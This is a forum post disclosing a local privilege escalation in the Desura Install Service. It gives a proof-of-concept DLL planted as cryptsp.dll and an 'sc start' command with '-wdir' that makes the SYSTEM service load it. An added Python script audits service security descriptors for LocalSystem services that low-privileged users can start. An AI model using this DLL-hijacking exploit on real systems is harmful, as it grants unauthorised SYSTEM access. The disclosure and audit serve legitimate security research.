Desura Install Service privilege escalation


Post by aluigi

The following was a quick test I made back in October 2012 and it's still working.

"Desura is a digital distribution platform developed by Linden Research":
http://www.desura.com

Basically it's a competitor of Steam that, as I remember, was mainly focused on indie games and was then bought by Linden, the guys behind Second Life.

Anyway it's just a local privilege escalation to become SYSTEM by using an option of the installer service, not so important but interesting to show.

Compile a dll with the name cryptsp.dll. The following is a quick example of a dll for testing whether you are able to write in a folder that requires Administrator privileges:


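#include <windows.h>
#include <stdlib.h>   /* system() */

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ulReason, LPVOID lpReserved) {
    if(ulReason == DLL_PROCESS_ATTACH) {
        /* Writing under c:\windows only succeeds with elevated privileges. */
        system("echo HELLO > c:\\windows\\poc.txt");
        Sleep(-1);   /* -1 == INFINITE: block here forever */
    }
    return TRUE;
}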


Create an empty folder called bin and put the dll there.

Kill/close the Desura client if it's running.

Let's say your current folder is z:\poc and the dll is located in z:\poc\bin\cryptsp.dll
Now start the service (any user can do that, just like with Steam) using the -wdir option:


sc start "Desura Install Service" -wdir z:\poc


That's all.

Source code of Desura Service:
https://github.com/desura/Desurium/blob ... ceMain.cpp

If you want to read about something similar for Steam:
http://revuln.com/files/ReVuln_Steam_Se ... curity.pdf
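
The post relies on any user being allowed to start a service that runs as SYSTEM. The following is an added audit example, not part of the original post or of Desura's code: it parses service security descriptors in the SDDL form printed by `sc sdshow` and flags LocalSystem services whose DACL lets low-privileged principals start them. The service names and SDDL strings are constructed samples.

```python
import re

# SDDL trustee aliases for principals that include ordinary, non-admin users.
LOW_PRIV = {"WD": "Everyone", "AU": "Authenticated Users",
            "IU": "Interactive", "BU": "Built-in Users"}
SERVICE_START = 0x0010  # written as "RP" in a service SDDL string
# Generic rights that the service object type maps onto SERVICE_START.
IMPLIES_START = {"RP", "GA", "GX"}

def grants_start(rights):
    """True if an ACE rights field (two-letter codes or hex mask) includes SERVICE_START."""
    if rights.lower().startswith("0x"):
        return bool(int(rights, 16) & SERVICE_START)
    codes = {rights[i:i + 2] for i in range(0, len(rights), 2)}
    return bool(codes & IMPLIES_START)

def low_priv_starters(sddl):
    """Return the low-privileged trustees that the DACL allows to start the service."""
    dacl = sddl.split("D:", 1)[-1].split("S:", 1)[0]  # drop owner/group and SACL
    allowed, denied = set(), set()
    for ace in re.findall(r"\(([^()]*)\)", dacl):
        fields = ace.split(";")  # type;flags;rights;object;inherited;trustee
        if len(fields) < 6 or fields[5] not in LOW_PRIV or not grants_start(fields[2]):
            continue
        if fields[0] == "A":
            allowed.add(fields[5])
        elif fields[0] == "D":
            denied.add(fields[5])
    return sorted(allowed - denied)

def audit(services):
    """services: (name, run_as_account, sddl) tuples, e.g. from `sc qc` and `sc sdshow`."""
    findings = {}
    for name, account, sddl in services:
        who = low_priv_starters(sddl)
        if who and account.lower() == "localsystem":
            findings[name] = [LOW_PRIV[t] for t in who]
    return findings

# Constructed sample data (not taken from a real machine or from Desura's installer).
SAMPLE = [
    ("ExampleInstallService", "LocalSystem",
     "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCLCSWRPLOCRRC;;;AU)"),
    ("ExampleLockedService", "LocalSystem",
     "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCLCSWLOCRRC;;;IU)S:(AU;FA;RPWP;;;WD)"),
    ("ExampleHexService", "NT AUTHORITY\\LocalService", "D:(A;;0x10;;;WD)"),
]
```

A flagged service is only a candidate for review: what matters next is whether it acts on start arguments or loads code from a location its caller controls, as the `-wdir` option does here.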